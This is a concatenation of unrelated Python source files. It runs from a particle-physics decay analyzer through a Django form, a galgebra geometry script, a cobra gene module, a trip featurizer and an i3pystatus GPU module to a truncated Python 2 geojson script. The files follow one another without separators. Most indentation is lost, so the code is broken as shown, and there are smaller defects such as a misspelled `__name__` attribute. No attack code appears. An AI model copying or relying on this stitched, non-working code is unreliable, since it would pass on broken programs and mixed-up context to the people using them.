kstar = ptc_gen2
max_svtv_distance = max(math.sqrt((tv_dplus.x - sv.x) ** 2 + (tv_dplus.y - sv.y) ** 2 + (tv_dplus.z - sv.z) ** 2), math.sqrt((tv_dminus.x - sv.x) ** 2 + (tv_dminus.y - sv.y) ** 2 + (tv_dminus.z - sv.z) ** 2))
if max_svtv_distance > 0.5: # select only events with long flight distance of the Ds mesons
self.max_svtv_distance_counter += 1
pis_dplus = []
pis_dminus = []
for ptc_gen3 in ptcs:
if ptc_gen3.start_vertex == kstar.end_vertex:
# looking for K
if abs(ptc_gen3.pdgid) == 321:
k = ptc_gen3
# looking for pi
if abs(ptc_gen3.pdgid) == 211:
pi_kstar = ptc_gen3
if ptc_gen3.start_vertex == dplus.end_vertex:
# looking for pi+/-
if abs(ptc_gen3.pdgid) == 211:
pis_dplus.append(ptc_gen3)
# looking for K0L
if ptc_gen3.pdgid == 130:
k0_dplus = ptc_gen3
if ptc_gen3.start_vertex == dminus.end_vertex:
# looking for pi+/-
if abs(ptc_gen3.pdgid) == 211:
pis_dminus.append(ptc_gen3)
# looking for K0L
if ptc_gen3.pdgid == 130:
k0_dminus = ptc_gen3
if len(pis_dplus) == 3:
pi1_dplus, pi2_dplus, pi3_dplus = pis_dplus[0], pis_dplus[1], pis_dplus[2]
if len(pis_dminus) == 3:
pi1_dminus, pi2_dminus, pi3_dminus = pis_dminus[0], pis_dminus[1], pis_dminus[2]
# filling histograms
self.pvsv_distance_hist.Fill(pvsv_distance)
self.pb_hist.Fill(pb)
self.max_svtv_distance_hist.Fill(max_svtv_distance)
# filling MC truth information
self.mc_truth_tree.fill('event_number', event_number)
self.mc_truth_tree.fill('n_particles', n_particles)
self.mc_truth_tree.fill('pv_x', pv.x)
self.mc_truth_tree.fill('pv_y', pv.y)
self.mc_truth_tree.fill('pv_z', pv.z)
self.mc_truth_tree.fill('sv_x', sv.x)
self.mc_truth_tree.fill('sv_y', sv.y)
self.mc_truth_tree.fill('sv_z', sv.z)
self.mc_truth_tree.fill('tv_dplus_x', tv_dplus.x)
self.mc_truth_tree.fill('tv_dplus_y', tv_dplus.y)
self.mc_truth_tree.fill('tv_dplus_z', tv_dplus.z)
self.mc_truth_tree.fill('tv_dminus_x', tv_dminus.x)
self.mc_truth_tree.fill('tv_dminus_y', tv_dminus.y)
self.mc_truth_tree.fill('tv_dminus_z', tv_dminus.z)
self.mc_truth_tree.fill('b_px', b.p.px)
self.mc_truth_tree.fill('b_py', b.p.py)
self.mc_truth_tree.fill('b_pz', b.p.pz)
self.mc_truth_tree.fill('kstar_px', kstar.p.px)
self.mc_truth_tree.fill('kstar_py', kstar.p.py)
self.mc_truth_tree.fill('kstar_pz', kstar.p.pz)
self.mc_truth_tree.fill('k_q', k.charge)
self.mc_truth_tree.fill('k_px', k.p.px)
self.mc_truth_tree.fill('k_py', k.p.py)
self.mc_truth_tree.fill('k_pz', k.p.pz)
self.mc_truth_tree.fill('pi_kstar_q', pi_kstar.charge)
self.mc_truth_tree.fill('pi_kstar_px', pi_kstar.p.px)
self.mc_truth_tree.fill('pi_kstar_py', pi_kstar.p.py)
self.mc_truth_tree.fill('pi_kstar_pz', pi_kstar.p.pz)
self.mc_truth_tree.fill('dplus_px', dplus.p.px)
self.mc_truth_tree.fill('dplus_py', dplus.p.py)
self.mc_truth_tree.fill('dplus_pz', dplus.p.pz)
self.mc_truth_tree.fill('pi1_dplus_q', pi1_dplus.charge)
self.mc_truth_tree.fill('pi1_dplus_px', pi1_dplus.p.px)
self.mc_truth_tree.fill('pi1_dplus_py', pi1_dplus.p.py)
self.mc_truth_tree.fill('pi1_dplus_pz', pi1_dplus.p.pz)
self.mc_truth_tree.fill('pi2_dplus_q', pi2_dplus.charge)
self.mc_truth_tree.fill('pi2_dplus_px', pi2_dplus.p.px)
self.mc_truth_tree.fill('pi2_dplus_py', pi2_dplus.p.py)
self.mc_truth_tree.fill('pi2_dplus_pz', pi2_dplus.p.pz)
self.mc_truth_tree.fill('pi3_dplus_q', pi3_dplus.charge)
self.mc_truth_tree.fill('pi3_dplus_px', pi3_dplus.p.px)
self.mc_truth_tree.fill('pi3_dplus_py', pi3_dplus.p.py)
self.mc_truth_tree.fill('pi3_dplus_pz', pi3_dplus.p.pz)
self.mc_truth_tree.fill('k0_dplus_px', k0_dplus.p.px)
self.mc_truth_tree.fill('k0_dplus_py', k0_dplus.p.py)
self.mc_truth_tree.fill('k0_dplus_pz', k0_dplus.p.pz)
self.mc_truth_tree.fill('dminus_px', dminus.p.px)
self.mc_truth_tree.fill('dminus_py', dminus.p.py)
self.mc_truth_tree.fill('dminus_pz', dminus.p.pz)
self.mc_truth_tree.fill('pi1_dminus_q', pi1_dminus.charge)
self.mc_truth_tree.fill('pi1_dminus_px', pi1_dminus.p.px)
self.mc_truth_tree.fill('pi1_dminus_py', pi1_dminus.p.py)
self.mc_truth_tree.fill('pi1_dminus_pz', pi1_dminus.p.pz)
self.mc_truth_tree.fill('pi2_dminus_q', pi2_dminus.charge)
self.mc_truth_tree.fill('pi2_dminus_px', pi2_dminus.p.px)
self.mc_truth_tree.fill('pi2_dminus_py', pi2_dminus.p.py)
self.mc_truth_tree.fill('pi2_dminus_pz', pi2_dminus.p.pz)
self.mc_truth_tree.fill('pi3_dminus_q', pi3_dminus.charge)
self.mc_truth_tree.fill('pi3_dminus_px', pi3_dminus.p.px)
self.mc_truth_tree.fill('pi3_dminus_py', pi3_dminus.p.py)
self.mc_truth_tree.fill('pi3_dminus_pz', pi3_dminus.p.pz)
self.mc_truth_tree.fill('k0_dminus_px', k0_dminus.p.px)
self.mc_truth_tree.fill('k0_dminus_py', k0_dminus.p.py)
self.mc_truth_tree.fill('k0_dminus_pz', k0_dminus.p.pz)
self.mc_truth_tree.tree.Fill()
# map the Ds decay products onto the tau-named branches of the shared output tree
tv_tauplus = tv_dplus
pi1_tauplus = pi1_dplus
pi2_tauplus = pi2_dplus
pi3_tauplus = pi3_dplus
tv_tauminus = tv_dminus
pi1_tauminus = pi1_dminus
pi2_tauminus = pi2_dminus
pi3_tauminus = pi3_dminus
# filling event information
self.tree.fill('event_number', event_number)
self.tree.fill('n_particles', n_particles)
self.tree.fill('pv_x', numpy.random.normal(pv.x, self.cfg_ana.pv_x_resolution) if self.cfg_ana.smear_pv else pv.x)
self.tree.fill('pv_y', numpy.random.normal(pv.y, self.cfg_ana.pv_y_resolution) if self.cfg_ana.smear_pv else pv.y)
self.tree.fill('pv_z', numpy.random.normal(pv.z, self.cfg_ana.pv_z_resolution) if self.cfg_ana.smear_pv else pv.z)
self.tree.fill('sv_x', numpy.random.normal(sv.x, self.cfg_ana.sv_x_resolution) if self.cfg_ana.smear_sv else sv.x)
self.tree.fill('sv_y', numpy.random.normal(sv.y, self.cfg_ana.sv_y_resolution) if self.cfg_ana.smear_sv else sv.y)
self.tree.fill('sv_z', numpy.random.normal(sv.z, self.cfg_ana.sv_z_resolution) if self.cfg_ana.smear_sv else sv.z)
self.tree.fill('tv_tauplus_x', numpy.random.normal(tv_tauplus.x, self.cfg_ana.tv_x_resolution) if self.cfg_ana.smear_tv else tv_tauplus.x)
self.tree.fill('tv_tauplus_y', numpy.random.normal(tv_tauplus.y, self.cfg_ana.tv_y_resolution) if self.cfg_ana.smear_tv else tv_tauplus.y)
self.tree.fill('tv_tauplus_z', numpy.random.normal(tv_tauplus.z, self.cfg_ana.tv_z_resolution) if self.cfg_ana.smear_tv else tv_tauplus.z)
self.tree.fill('tv_tauminus_x', numpy.random.normal(tv_tauminus.x, self.cfg_ana.tv_x_resolution) if self.cfg_ana.smear_tv else tv_tauminus.x)
self.tree.fill('tv_tauminus_y', numpy.random.normal(tv_tauminus.y, self.cfg_ana.tv_y_resolution) if self.cfg_ana.smear_tv else tv_tauminus.y)
self.tree.fill('tv_tauminus_z', numpy.random.normal(tv_tauminus.z, self.cfg_ana.tv_z_resolution) if self.cfg_ana.smear_tv else tv_tauminus.z)
self.tree.fill('pi1_tauplus_q', pi1_tauplus.charge)
self.tree.fill('pi1_tauplus_px', numpy.random.normal(pi1_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.px)
self.tree.fill('pi1_tauplus_py', numpy.random.normal(pi1_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.py)
self.tree.fill('pi1_tauplus_pz', numpy.random.normal(pi1_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.pz)
self.tree.fill('pi2_tauplus_q', pi2_tauplus.charge)
self.tree.fill('pi2_tauplus_px', numpy.random.normal(pi2_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.px)
self.tree.fill('pi2_tauplus_py', numpy.random.normal(pi2_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.py)
self.tree.fill('pi2_tauplus_pz', numpy.random.normal(pi2_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.pz)
self.tree.fill('pi3_tauplus_q', pi3_tauplus.charge)
self.tree.fill('pi3_tauplus_px', numpy.random.normal(pi3_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.px)
self.tree.fill('pi3_tauplus_py', numpy.random.normal(pi3_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.py)
self.tree.fill('pi3_tauplus_pz', numpy.random.normal(pi3_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.pz)
self.tree.fill('pi1_tauminus_q', pi1_tauminus.charge)
self.tree.fill('pi1_tauminus_px', numpy.random.normal(pi1_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.px)
self.tree.fill('pi1_tauminus_py', numpy.random.normal(pi1_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.py)
self.tree.fill('pi1_tauminus_pz', numpy.random.normal(pi1_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.pz)
self.tree.fill('pi2_tauminus_q', pi2_tauminus.charge)
self.tree.fill('pi2_tauminus_px', numpy.random.normal(pi2_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.px)
self.tree.fill('pi2_tauminus_py', numpy.random.normal(pi2_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.py)
self.tree.fill('pi2_tauminus_pz', numpy.random.normal(pi2_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi2_tauminus.p.pz)
self.tree.fill('pi3_tauminus_q', pi3_tauminus.charge)
self.tree.fill('pi3_tauminus_px', numpy.random.normal(pi3_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.px)
self.tree.fill('pi3_tauminus_py', numpy.random.normal(pi3_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.py)
self.tree.fill('pi3_tauminus_pz', numpy.random.normal(pi3_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi3_tauminus.p.pz)
self.tree.fill('k_q', k.charge)
self.tree.fill('k_px', numpy.random.normal(k.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else k.p.px)
self.tree.fill('k_py', numpy.random.normal(k.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else k.p.py)
self.tree.fill('k_pz', numpy.random.normal(k.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else k.p.pz)
self.tree.fill('pi_kstar_q', pi_kstar.charge)
self.tree.fill('pi_kstar_px', numpy.random.normal(pi_kstar.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.px)
self.tree.fill('pi_kstar_py', numpy.random.normal(pi_kstar.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.py)
self.tree.fill('pi_kstar_pz', numpy.random.normal(pi_kstar.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi_kstar.p.pz)
self.tree.tree.Fill()
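def smear(value, resolution, enabled):
    """Hypothetical helper, not part of the original analyzer: the
    `numpy.random.normal(x, res) if smear else x` pattern above repeats for
    every coordinate; a helper like this would express it once."""
    return numpy.random.normal(value, resolution) if enabled else value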
# -*- coding: utf-8 -*-
"""
Define forms for each request for validating request arguments
"""
from django import forms
from tcms.testruns.models import TestCaseRun
from tcms.core.forms.fields import StripURLField
__all__ = (
"BasicValidationForm",
"AddLinkReferenceForm",
)
LINKREF_TARGET = {
"TestCaseRun": TestCaseRun,
}
class TargetCharField(forms.CharField):
"""Return clean Model class besides all of CharField"""
default_error_messages = {
"invalid_target": "Invalid target %(value)s. TCMS cannot determine the"
" model class according to this target."
}
def __init__(self, targets=None, *args, **kwargs):
    super().__init__(*args, **kwargs)
    self.targets = targets or {}
def clean(self, value):
"""Return the Model class object associated with the value"""
super().clean(value)
model_class = self.targets.get(value, None)
if model_class is None:
raise forms.ValidationError(self.error_messages["invalid_target"] % {"value": value})
return model_class
class BasicValidationForm(forms.Form):
"""Validate target and target ID basically"""
target = TargetCharField(
targets=LINKREF_TARGET,
error_messages={
"required": "Due to miss the target argument, TCMS does not know "
"to which the new link will be linked."
},
)
target_id = forms.IntegerField(
error_messages={
"required": "target ID argument should appear in the request for "
"adding new link as long as the target argument."
}
)
class AddLinkReferenceForm(BasicValidationForm):
"""Validate the argument within the request for adding new link"""
name = forms.CharField(error_messages={"required": "You should name this new link."})
url = StripURLField(error_messages={"required": "Missing URL."})
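# Hypothetical view-side usage of the form above (names illustrative):
#
#     form = AddLinkReferenceForm(request.POST)
#     if form.is_valid():
#         model_class = form.cleaned_data["target"]  # e.g. TestCaseRun
#         target = model_class.objects.get(pk=form.cleaned_data["target_id"])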
from sympy import symbols, sin, pi, latex
from galgebra.ga import Ga
from galgebra.printer import Format, xpdf
Format()
coords = (r, th, phi) = symbols('r,theta,phi', real=True)
sp3d = Ga('e_r e_th e_ph', g=[1, r**2, r**2 * sin(th)**2],
coords=coords, norm=True)
sph_uv = (u, v) = symbols('u,v', real=True)
sph_map = [1, u, v] # Coordinate map for sphere of r = 1
sph2d = sp3d.sm(sph_map, sph_uv)
print(r'(u,v)\rightarrow (r,\theta,\phi) = ', latex(sph_map))
# FIXME submanifold basis vectors are not normalized, g is incorrect
print('g =', latex(sph2d.g))
F = sph2d.mv('F', 'vector', f=True) # vector function
f = sph2d.mv('f', 'scalar', f=True) # scalar function
print(r'\nabla f =', sph2d.grad * f)
print('F =', F)
print(r'\nabla F = ', sph2d.grad * F)
cir_s = s = symbols('s', real=True)
cir_map = [pi / 8, s]
cir1d = sph2d.sm(cir_map, (cir_s,))
print('g =', latex(cir1d.g))
h = cir1d.mv('h', 'scalar', f=True)
H = cir1d.mv('H', 'vector', f=True)
print(r'(s)\rightarrow (u,v) = ', latex(cir_map))
print('H =', H)
print(latex(H))
print(r'\nabla h =', cir1d.grad * h)
print(r'\nabla H =', cir1d.grad * H)
xpdf(filename='submanifold.tex', paper=(6, 5), crop=True)
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import re
from ast import parse as ast_parse
from ast import (
And, BitAnd, BitOr, BoolOp, Expression, Name, NodeTransformer, Or)
from keyword import kwlist
from warnings import warn
from cobra.core.species import Species
from cobra.util import resettable
from cobra.util.util import format_long_string
keywords = list(kwlist)
keywords.remove("and")
keywords.remove("or")
keywords.extend(("True", "False"))
keyword_re = re.compile(r"(?=\b(%s)\b)" % "|".join(keywords))
number_start_re = re.compile(r"(?=\b[0-9])")
replacements = (
(".", "__COBRA_DOT__"),
("'", "__COBRA_SQUOTE__"),
('"', "__COBRA_DQUOTE__"),
(":", "__COBRA_COLON__"),
("/", "__COBRA_FSLASH__"),
("\\", "__COBRA_BSLASH"),
("-", "__COBRA_DASH__"),
("=", "__COBRA_EQ__")
)
# functions for gene reaction rules
def ast2str(expr, level=0, names=None):
"""convert compiled ast to gene_reaction_rule str
Parameters
----------
expr : Expression
compiled ast of a gene reaction rule, e.g. of "a and b"
level : int
internal use only
names : dict
Dict where each key is a gene identifier and the value is the
gene name. Use this to get a rule str which uses names instead. This
should be done for display purposes only. All gene_reaction_rule
strings used in computations should use the id.
Returns
-------
string
The gene reaction rule
"""
if isinstance(expr, Expression):
return ast2str(expr.body, 0, names) \
if hasattr(expr, "body") else ""
elif isinstance(expr, Name):
return names.get(expr.id, expr.id) if names else expr.id
elif isinstance(expr, BoolOp):
op = expr.op
if isinstance(op, Or):
str_exp = " or ".join(ast2str(i, level + 1, names)
for i in expr.values)
elif isinstance(op, And):
str_exp = " and ".join(ast2str(i, level + 1, names)
for i in expr.values)
else:
raise TypeError("unsupported operation " + op.__class__.__name)
return "(" + str_exp + ")" if level else str_exp
elif expr is None:
return ""
else:
raise TypeError("unsupported operation " + repr(expr))
def eval_gpr(expr, knockouts):
"""evaluate compiled ast of gene_reaction_rule with knockouts
Parameters
----------
expr : Expression
The ast of the gene reaction rule
knockouts : DictList, set
Set of genes that are knocked out
Returns
-------
bool
True if the gene reaction rule is true with the given knockouts
otherwise false
"""
if isinstance(expr, Expression):
return eval_gpr(expr.body, knockouts)
elif isinstance(expr, Name):
return expr.id not in knockouts
elif isinstance(expr, BoolOp):
op = expr.op
if isinstance(op, Or):
return any(eval_gpr(i, knockouts) for i in expr.values)
elif isinstance(op, And):
return all(eval_gpr(i, knockouts) for i in expr.values)
else:
raise TypeError("unsupported operation " + op.__class__.__name__)
elif expr is None:
return True
else:
raise TypeError("unsupported operation " + repr(expr))
class GPRCleaner(NodeTransformer):
"""Parses compiled ast of a gene_reaction_rule and identifies genes
Parts of the tree are rewritten to allow periods in gene ID's and
bitwise boolean operations"""
def __init__(self):
NodeTransformer.__init__(self)
self.gene_set = set()
def visit_Name(self, node):
if node.id.startswith("__cobra_escape__"):
node.id = node.id[16:]
for char, escaped in replacements:
if escaped in node.id:
node.id = node.id.replace(escaped, char)
self.gene_set.add(node.id)
return node
def visit_BinOp(self, node):
self.generic_visit(node)
if isinstance(node.op, BitAnd):
return BoolOp(And(), (node.left, node.right))
elif isinstance(node.op, BitOr):
return BoolOp(Or(), (node.left, node.right))
else:
raise TypeError("unsupported operation '%s'" %
node.op.__class__.__name__)
def parse_gpr(str_expr):
"""parse gpr into AST
Parameters
----------
str_expr : string
string with the gene reaction rule to parse
Returns
-------
tuple
elements ast_tree and gene_ids as a set
"""
str_expr = str_expr.strip()
if len(str_expr) == 0:
return None, set()
for char, escaped in replacements:
if char in str_expr:
str_expr = str_expr.replace(char, escaped)
escaped_str = keyword_re.sub("__cobra_escape__", str_expr)
escaped_str = number_start_re.sub("__cobra_escape__", escaped_str)
tree = ast_parse(escaped_str, "<string>", "eval")
cleaner = GPRCleaner()
cleaner.visit(tree)
eval_gpr(tree, set()) # ensure the rule can be evaluated
return tree, cleaner.gene_set
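# Hypothetical round trip through the helpers above:
#
#     tree, genes = parse_gpr("(b0001 and b0002) or b0003")
#     genes                      # {'b0001', 'b0002', 'b0003'}
#     ast2str(tree)              # '(b0001 and b0002) or b0003'
#     eval_gpr(tree, {"b0001"})  # True -- b0003 alone satisfies the rule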
class Gene(Species):
"""A Gene in a cobra model
Parameters
----------
id : string
The identifier to associate the gene with
name: string
A longer human readable name for the gene
functional: bool
Indicates whether the gene is functional. If it is not functional
then it cannot be used in an enzyme complex nor can its products be
used.
"""
def __init__(self, id=None, name="", functional=True):
Species.__init__(self, id=id, name=name)
self._functional = functional
@property
def functional(self):
"""A flag indicating if the gene is functional.
Changing the flag is reverted upon exit if executed within the model
as context.
"""
return self._functional
@functional.setter
@resettable
def functional(self, value):
if not isinstance(value, bool):
raise ValueError('expected boolean')
self._functional = value
def knock_out(self):
"""Knockout gene by marking it as non-functional and setting all
associated reactions bounds to zero.
The change is reverted upon exit if executed within the model as
context.
"""
self.functional = False
for reaction in self.reactions:
if not reaction.functional:
reaction.bounds = (0, 0)
def remove_from_model(self, model=None,
make_dependent_reactions_nonfunctional=True):
"""Removes the association
Parameters
----------
model : cobra model
The model to remove the gene from
make_dependent_reactions_nonfunctional : bool
If True then replace the gene with 'False' in the gene
association, else replace the gene with 'True'
.. deprecated :: 0.4
Use cobra.manipulation.delete_model_genes to simulate knockouts
and cobra.manipulation.remove_genes to remove genes from
the model.
"""
warn("Use cobra.manipulation.remove_genes instead")
if model is not None:
if model != self._model:
raise Exception("%s is a member of %s, not %s" %
(repr(self), repr(self._model), repr(model)))
if self._model is None:
raise Exception('%s is not in a model' % repr(self))
if make_dependent_reactions_nonfunctional:
gene_state = 'False'
else:
gene_state = 'True'
the_gene_re = re.compile('(^|(?<=( |\()))%s(?=( |\)|$))' %
re.escape(self.id))
self._model.genes.remove(self)
self._model = None
for the_reaction in list(self._reaction):
the_reaction._gene_reaction_rule = the_gene_re.sub(
gene_state, the_reaction.gene_reaction_rule)
the_reaction._genes.remove(self)
# Now, deactivate the reaction if its gene association evaluates
# to False
the_gene_reaction_relation = the_reaction.gene_reaction_rule
for other_gene in the_reaction._genes:
other_gene_re = re.compile('(^|(?<=( |\()))%s(?=( |\)|$))' %
re.escape(other_gene.id))
the_gene_reaction_relation = other_gene_re.sub(
'True',
the_gene_reaction_relation)
if not eval(the_gene_reaction_relation):
the_reaction.lower_bound = 0
the_reaction.upper_bound = 0
self._reaction.clear()
def _repr_html_(self):
return """
<table>
<tr>
<td><strong>Gene identifier</strong></td><td>{id}</td>
</tr><tr>
<td><strong>Name</strong></td><td>{name}</td>
</tr><tr>
<td><strong>Memory address</strong></td>
<td>{address}</td>
</tr><tr>
<td><strong>Functional</strong></td><td>{functional}</td>
</tr><tr>
<td><strong>In {n_reactions} reaction(s)</strong></td><td>
{reactions}</td>
</tr>
</table>""".format(id=self.id, name=self.name,
functional=self.functional,
address='0x0%x' % id(self),
n_reactions=len(self.reactions),
reactions=format_long_string(
', '.join(r.id for r in self.reactions), 200))
#!/usr/bin/env python3
""" This script featurizes the data
(low level features: cartesian --> polar --> velocity --> acceleration)
For each file(trip) in path, loads data into a pandas DataFrame, adds features,
pickles DataFrame and saves in file with corresponding name
Dependencies: Python3, Pandas, Numpy, Theano, Lasagne
Command Line Arguments:
-source Data source folder, expects unzipped data
-dest Destination folder
-procs Number of processes to spawn during featurizing
Eg:
$ python3 featurize_data.py -source data/drivers -dest data/drivers_featurized -procs 4
"""
__author__ = 'Sid Pramod'
__all__ = ['featurize_trip', 'featurize_driver', 'featurize_all']
import argparse
import os
import errno
import warnings
import numpy as np
import pandas as pd
import multiprocessing
def _parse_cmd():
""" Parse command line arguments."""
cmd = argparse.ArgumentParser(description='Run Classifier')
cmd.add_argument('-source', default='data/drivers', help='Data source folder (unzipped)')
cmd.add_argument('-dest', default='data/drivers_featurized', help='Destination folder')
cmd.add_argument('-procs', default=4, type=int, help='Number of processes to spawn')
options = cmd.parse_args()
try:
os.makedirs(options.dest)
except OSError as exception:
if exception.errno == errno.EEXIST:
warnings.warn('Folder {0} already exists, files may be overwritten'.format(options.dest))
else:
raise
return options
def _load_csv_trip(filename, dtype=np.float64):
""" Load data corresponding to a single trip from csv file named `filename`."""
df = pd.read_csv(filename).astype(dtype)
np.testing.assert_equal(df.columns, np.array(['x', 'y']))
# from the data, it seems all positions are relative since they all seem to start at 0, 0;
# asserting to make sure and explicit
np.testing.assert_equal(df.iloc[0], np.array([0, 0]))
# remove any nan (interpolate returns a new DataFrame; reassign it)
df = df.interpolate()
assert(not np.any(np.isnan(df.values)))
return df
def _get_polar_trip(df):
""" Obtain polar co-ordinates from cartesian."""
assert('x' in df.columns and 'y' in df.columns)
# Reference x and y
x, y = df['x'], df['y']
# Get polar co-ordinates
df['r'] = np.sqrt(x ** 2 + y ** 2)
df['th'] = np.arctan2(y, x)
return
def _get_velocity_trip(df):
""" Add velocities. Assumes df has polar co-ords."""
assert('r' in df.columns and 'th' in df.columns)
# Reference r and th
r, th = df['r'], df['th']
# Get velocities in r and th directions
dt = 1
df['vel_r'] = np.gradient(r, dt)
df['vel_th'] = np.gradient(th, dt)
return
def _get_acceleration_trip(df):
""" Add accelerations. Assumes df has velocities."""
assert('vel_r' in df.columns and 'vel_th' in df.columns)
# Reference vel_r and vel_th
vel_r, vel_th = df['vel_r'], df['vel_th']
# Get accelerations in r and th directions
dt = 1
df['acc_r'] = np.gradient(vel_r, dt)
df['acc_th'] = np.gradient(vel_th, dt)
return
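# For intuition: with unit spacing, np.gradient uses central differences in
# the interior and one-sided differences at the ends, e.g. (values
# illustrative):
#
#     np.gradient(np.array([0., 1., 4., 9.]), 1)  # -> array([1., 2., 4., 5.])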
def _add_features_trip(df):
""" Convert to polar, add first and second derivative (velocity and acceleration)."""
_get_polar_trip(df)
_get_velocity_trip(df)
_get_acceleration_trip(df)
return
def featurize_trip(source_file, dest_file):
""" Do all that this program is supposed to for a single trip."""
if source_file == dest_file:
raise ValueError('Source file cannot be destination file, overwriting disabled.')
df = _load_csv_trip(source_file)
_add_features_trip(df)
if not os.path.exists(os.path.dirname(dest_file)):
os.makedirs(os.path.dirname(dest_file))
df.astype(np.float32).to_pickle(dest_file)
return
def featurize_driver(source_folder, dest_folder):
""" Do all that this program is supposed to for all trips from a single driver."""
if source_folder == dest_folder:
raise ValueError('Source folder cannot be destination folder, overwriting disabled.')
files = [f for f in os.listdir(source_folder)
if os.path.isfile(os.path.join(source_folder, f))]
source = lambda f: os.path.join(source_folder, f)
dest = lambda f: os.path.join(dest_folder, os.path.splitext(f)[0] + '.pkl')
for f in files:
featurize_trip(source(f), dest(f))
return
def featurize_all(source_folder, dest_folder, multiproc_poolsize=1):
""" Do all that this program is supposed to for all trips from all drivers."""
if source_folder == dest_folder:
raise ValueError('Source folder cannot be destination folder, overwriting disabled.')
sub_folders = [s for s in os.listdir(source_folder)
if os.path.isdir(os.path.join(source_folder, s))]
pool = multiprocessing.Pool(multiproc_poolsize)
source_sub_folder = lambda s: os.path.join(source_folder, s)
dest_sub_folder = lambda s: os.path.join(dest_folder, s)
pool.starmap(featurize_driver, [(source_sub_folder(s), dest_sub_folder(s)) for s in sub_folders])
return
def main():
options = _parse_cmd()
featurize_all(source_folder=options.source, dest_folder=options.dest, multiproc_poolsize=options.procs)
if __name__ == '__main__':
main()
from i3pystatus import IntervalModule
from .utils import gpu
class GPUMemory(IntervalModule):
"""
Shows GPU memory load
Currently Nvidia only; requires nvidia-smi
.. rubric:: Available formatters
* {avail_mem}
* {percent_used_mem}
* {used_mem}
* {total_mem}
"""
settings = (
("format", "format string used for output."),
("divisor", "divide all megabyte values by this value, default is 1 (megabytes)"),
("warn_percentage", "minimal percentage for warn state"),
("alert_percentage", "minimal percentage for alert state"),
("color", "standard color"),
("warn_color", "defines the color used wann warn percentage ist exceeded"),
("alert_color", "defines the color used when alert percentage is exceeded"),
("round_size", "defines number of digits in round"),
)
format = "{avail_mem} MiB"
divisor = 1
color = "#00FF00"
warn_color = "#FFFF00"
alert_color = "#FF0000"
warn_percentage = 50
alert_percentage = 80
round_size = 1
def run(self):
info = gpu.query_nvidia_smi()
if info.used_mem is not None and info.total_mem is not None:
mem_percent = 100 * info.used_mem / info.total_mem
else:
mem_percent = None
if mem_percent is not None and mem_percent >= self.alert_percentage:
    color = self.alert_color
elif mem_percent is not None and mem_percent >= self.warn_percentage:
    color = self.warn_color
else:
    color = self.color
cdict = {
    "used_mem": info.used_mem / self.divisor if info.used_mem is not None else None,
    "avail_mem": info.avail_mem / self.divisor if info.avail_mem is not None else None,
    "total_mem": info.total_mem / self.divisor if info.total_mem is not None else None,
    "percent_used_mem": mem_percent,
}
for key, value in cdict.items():
if value is not None:
cdict[key] = round(value, self.round_size)
self.data = cdict
self.output = {
"full_text": self.format.format(**cdict),
"color": color
}
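# Hypothetical i3pystatus configuration using this module (registration name
# and thresholds illustrative):
#
#     from i3pystatus import Status
#     status = Status()
#     status.register("gpu_mem",
#                     format="{used_mem}/{total_mem} MiB ({percent_used_mem}%)",
#                     warn_percentage=60, alert_percentage=90)
#     status.run()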
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Author: Alexis Luengas Zimmer
# Created: 5 Dec. 2014
#-------------------------------------------------------------------------------
from os.path import basename, isdir, dirname
import pandas as pd
import igraph as gr
#-------------------------------------------------------------------------------
def collect_data(json_files):
"""
json_files: a list containing json path-strings
Returns a sorted pandas.DataFrame object made up of all json objects
together.
"""
df_list = []
print "Processing..."
for filepath in json_files:
print "\rLoading file \"%s\"" % basename(filepath)
df = build_df(filepath)
df_list.append(df)
df = pd.concat(df_list) # merge list into one DF
df.sort(inplace=True)
return df
def build_df(json_path):
df = pd.read_json(json_path)
df["pid"] = [r["id"] for r in df.reporter] # pid ~ person id
df["name"] = [r["name"] for r in df.reporter]
df = df[["pid", "created_at", "lat", "lng", "name"]].sort(["pid", "created_at"]).set_index("pid")
return df
def df_to_graph(df):
# Build naked graph
g = gr.Graph(len(df.index.levels[0][1:])) # slice out first (anonymous) id
return g
#-------------------------------------------------------------------------------
def write_geojson(df, outpath):
geojson = '{"type":"FeatureCollection","features":['
for pid, fr in df[df.index > 0].groupby(level=0): # exclude id 0 (anonymous)
